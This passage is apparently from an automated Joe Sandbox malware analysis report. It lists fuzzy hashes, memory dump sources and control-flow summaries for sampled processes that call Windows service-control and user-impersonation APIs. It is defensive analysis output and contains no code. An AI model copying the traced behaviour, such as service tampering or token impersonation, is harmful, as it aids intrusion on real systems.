                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a76233d2c42ee66bd06ff93d0c5d1d2d9a79f0e578abbc9f65993f47bb2ffc66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEF098B45093019FE768FBB4BE0E6583B71FB14331B60061AE462862F1DF3E85468B15
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:56.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                              Signature Coverage:17.1%
                                                                                                                                                                                                                                              Total number of Nodes:35
                                                                                                                                                                                                                                              Total number of Limit Nodes:0

                                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeConfigService
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3849694230-0
                                                                                                                                                                                                                                              • Opcode ID: b5d85e2bcd2bcda22bad21d51eb2365963a6ad1e9f6d46d8db03bd053da20471
                                                                                                                                                                                                                                              • Instruction ID: 2b24988db6a038b90ca81cabb45cf61447c649b00cdef148b438b9eb34f098b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5d85e2bcd2bcda22bad21d51eb2365963a6ad1e9f6d46d8db03bd053da20471
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF18130918E4D4FEB68EE28D846BF977D1FB58750F10426AE84EC7291DF74A5818B82
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                                                                              • Opcode ID: f4a76ca12504d03128a95726818e1369f918ef0e14e2a1283ab07e0f020ddf57
                                                                                                                                                                                                                                              • Instruction ID: aa08a97a691cf2f81dfab09da2380b10554ac7d204710292ff428aa4ba47e3ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4a76ca12504d03128a95726818e1369f918ef0e14e2a1283ab07e0f020ddf57
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03917F30618A4D8FEB68EF28D8857EA77E1FF59350F10416AE84DC7291CF74A985CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
control_flow_graph 120 (node and edge listing omitted; the only API named in the graph is OpenServiceA)
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenService
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3098006287-0
                                                                                                                                                                                                                                              • Opcode ID: 45513fd4fa26e6a2b614ed22e086d9a53496cd27b8ff6a9234bef1b1071097e1
                                                                                                                                                                                                                                              • Instruction ID: 2db6e77071c7439ffa06b902d771386b4fff597f0bd2dfa53cc7cdf818cb0a43
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45513fd4fa26e6a2b614ed22e086d9a53496cd27b8ff6a9234bef1b1071097e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0519230518A4D8FEB58EF28D8467E977E5FB59350F10422AE84EC7292DF74E841CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
control_flow_graph 143 (node and edge listing omitted; the only API named in the graph is OpenServiceA)
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ca62f1dddba7baa5d94c0dea030b7ef0e368545cfcbe1ec8cc71a813218b4ef0
                                                                                                                                                                                                                                              • Instruction ID: 336906fd31504b5eed8368aa5133dadd91b5da3096ddb03412c3fe8411459191
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca62f1dddba7baa5d94c0dea030b7ef0e368545cfcbe1ec8cc71a813218b4ef0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18518030918A4D8FEB58EE18D84A7B977E5FB59750F10422EE84EC7291DF74E841CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
control_flow_graph 165 (node and edge listing omitted; the only API named in the graph is FindCloseChangeNotification)
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                                                              • Opcode ID: 75d3deba5576697e0cab723a6b0e3f64fa1b907ce0a2f474c8a2489b97320be3
                                                                                                                                                                                                                                              • Instruction ID: 2351f8793f0d6ea221f578f72d86147d7f195cf8326a24f6e1556dd9632332b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75d3deba5576697e0cab723a6b0e3f64fa1b907ce0a2f474c8a2489b97320be3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF31063190CA889FDB0ADB688805BE97FF0EF57320F0402AFD089C71A2DA696456CB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
control_flow_graph 172 (node and edge listing omitted; the only API named in the graph is OpenSCManagerW)
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ManagerOpen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1889721586-0
                                                                                                                                                                                                                                              • Opcode ID: 50d18941c99afa19610d1d2e122bc4e362a243a94ca7b63121f6f6b0a241908b
                                                                                                                                                                                                                                              • Instruction ID: a3633fe700eadf7e3653fd0d9ebb199ecd5ddd99e970ad73250f97b07a8b23b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50d18941c99afa19610d1d2e122bc4e362a243a94ca7b63121f6f6b0a241908b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9318E71908A1C8FDB28DF88D8896FAB7F0EB69721F10422ED04AD3651DF70A845CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 181 7ff815f61a3b-7ff815f61ad9 ControlService 184 7ff815f61adb 181->184 185 7ff815f61ae1-7ff815f61b09 181->185 184->185
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ControlService
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 253159669-0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 186 7ff815f6176e-7ff815f61802 ImpersonateLoggedOnUser 189 7ff815f6180a-7ff815f61831 186->189 190 7ff815f61804 186->190 190->189
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2216092060-0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 86b718bae6dda7c8079e39bea942b4c48bcb5b42df81107a90e24e64e3f8ba47
                                                                                                                                                                                                                                              • Instruction ID: c29e3a7f9a32529b9af46e78eba6c58d078c20d12e80be70f383f838089a8eb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86b718bae6dda7c8079e39bea942b4c48bcb5b42df81107a90e24e64e3f8ba47
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC716071E0061A8FDB14DFA9D4546AEBBF7BF89300F208529E809EB354DB709D46CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 315304ff50b6462b77f329391bcef2e0fc179a2baafa34ab6de2c7395c903b61
                                                                                                                                                                                                                                              • Instruction ID: 5ec4d11be3f3006a9c1786502d62ac380d7887ead1219c7df0ba6ebd41e385ab
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 315304ff50b6462b77f329391bcef2e0fc179a2baafa34ab6de2c7395c903b61
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC811C34A00219DFCB54DF64E5989ADBBF6FF88310B158959E816AB3A1DB70EC41CF90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 934f2b007aed8bd7a2771f273f8e6d80fda3de5b94226fc2d4f0323c36e491a8
                                                                                                                                                                                                                                              • Instruction ID: b3c8231ab6c16edf604ec53302e50574b1116871dfa1c140d1269edf45175ca0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 934f2b007aed8bd7a2771f273f8e6d80fda3de5b94226fc2d4f0323c36e491a8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81614F30911219CFCB14EFB8E45499DBBB6FF8A311F60566DE416B7290DF359889CB20
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f37c94adb5b897374704a08fd68de36ffc69a92dfefcd184ed9704b450234aa3
                                                                                                                                                                                                                                              • Instruction ID: d6b09aa6dd9abbaa5b3ece4ed1f48b2134ad9a556a859ac12e102dee35240d12
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f37c94adb5b897374704a08fd68de36ffc69a92dfefcd184ed9704b450234aa3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0613F30D11218CFCB14EFB8E4548ADBBB6FF8A311B60566DE416B7294DF359885CB24
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c5342cb47af47ab0c327d801163d244ae3fad21f1b87b38a835d710059f41751
                                                                                                                                                                                                                                              • Instruction ID: d609ac90228dacaf5deb7a2f1379723b0ef7a0d2bb2c0f310ba290bcd8e3114b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5342cb47af47ab0c327d801163d244ae3fad21f1b87b38a835d710059f41751
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC512B35A14219EFDF15DFA4E894DADBBB6BF88300F148415F812A7390DB749D41CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d4a7f9b048b5706a78a2ef8ac24f865d24acdb0097e3088042aee6abba78b030
                                                                                                                                                                                                                                              • Instruction ID: f505ad7a2c3e7f193fceea194c45c8c9e431c250c706504cf7c08ad1a36bf4e2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4a7f9b048b5706a78a2ef8ac24f865d24acdb0097e3088042aee6abba78b030
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94510274E01218CFCB18DFA9E9949EDBBB2FF88311F608529E809AB354DB355846CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a821f4d003ebdcd489168c3474f07248bf53f1095264a90d6cc1d88201d08950
                                                                                                                                                                                                                                              • Instruction ID: 7cabca84c7cd99ec3f9197e8736885c4e66b09a5dfbbd490de379dbc27933915
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a821f4d003ebdcd489168c3474f07248bf53f1095264a90d6cc1d88201d08950
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3651D534A44219DFDB14DFA4E994AADBBB6FF88310F158458E816AB360CB31EC42CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 624d944f7fe2f21dced1a69a4bdd4f28094b0fadb1ddb673df6110cc0bed45b6
                                                                                                                                                                                                                                              • Instruction ID: 23933de5b58bb5b2155223fe5407f46048651968aface5c537c0fdb79a7aff16
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 624d944f7fe2f21dced1a69a4bdd4f28094b0fadb1ddb673df6110cc0bed45b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C731BC32B052148FDB14EB68D86477EBBE6FB85310F14816AE80ADB391DE359C4687A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 100f01c841d0dce57ce96df71e292cb4b95753e0deb36c9476ce20f099473ba7
                                                                                                                                                                                                                                              • Instruction ID: 2bb8f31e99c6efc52d3b3e793326387d9ef2c044fd860082a0d1a7277d718dd4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 100f01c841d0dce57ce96df71e292cb4b95753e0deb36c9476ce20f099473ba7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE3159387042148FD758DF68D4A9AAE7BF6BF88710F148468E9039B3A0DE359D02CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e22e338c32c60702278a29690eec82d1c741ec4fc2fbbcc56b7beac6f92845f7
                                                                                                                                                                                                                                              • Instruction ID: fdaa63dab89079d1beb69a6afaca4cc6d7e5271dc55cf60ffff45b5732138a50
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e22e338c32c60702278a29690eec82d1c741ec4fc2fbbcc56b7beac6f92845f7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F319A32D10B0ACADB10AFB8C8002D8F771BF99324F258716E59A77640EB70B5D5CB84
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 231130f75e11c46e0228fdbbec17bb09b3519c1d4b3bbf0a0c43fff90180c3ed
                                                                                                                                                                                                                                              • Instruction ID: 83b8d6f95722d3834196bddf86b16278d772299bba588e973245fa2f3c60dc49
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 231130f75e11c46e0228fdbbec17bb09b3519c1d4b3bbf0a0c43fff90180c3ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6931AC39900209EFCF01EFE4EA458ACBFB2FB88314F008854FA11AB624DB365915CF20
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6e25250916573b03b29ae944934a45450725a36833ac76894e5a1dc08ee3425a
                                                                                                                                                                                                                                              • Instruction ID: 6a0e6e8f49ef55cace332b60a28d631b075309c62512ddc06ff8070e0ef78a55
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e25250916573b03b29ae944934a45450725a36833ac76894e5a1dc08ee3425a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11318932D10B0A9ADB10AFB9C8002D9F771FF99324F218719E59A77640EB70B5D4CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9d125102d37c56a072bf1d5e316bd0aa62229083c16cebf8690b2d9162a2a44a
                                                                                                                                                                                                                                              • Instruction ID: 89196ad2bbc905f4a2271af33b32e148cf0e5318db4bd9573de0d7947cda6fa9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d125102d37c56a072bf1d5e316bd0aa62229083c16cebf8690b2d9162a2a44a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C315E39911219EFCF01EFE4EA498ACBFB2FB88314F008414FA156B664DB365915DF60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2abf774dd3f095d064b778ac1075174e098433dc3537fe104e057688f3d566d3
                                                                                                                                                                                                                                              • Instruction ID: 463666af473b7fa6f0981a7d25ce05132ad722de882a54cc7a42491f97963645
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2abf774dd3f095d064b778ac1075174e098433dc3537fe104e057688f3d566d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C310A397442188FD758DF68D5A9AAE7BF2BF88710F148468E902AB3A0DF359D41CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8fe0760e71f9cbf0ce1eecb051cff7505fd45e39b3e2c74c701fc6a828c017be
                                                                                                                                                                                                                                              • Instruction ID: 83b292b5a2dc7d0156605125376e3f73c2fc95c3514d0d0e0d0d8d834e44b563
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe0760e71f9cbf0ce1eecb051cff7505fd45e39b3e2c74c701fc6a828c017be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2431B831E107068BCB11AFB8D4241AEF7B5FF85314B10C229D45AA7340EF74A982CBD0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
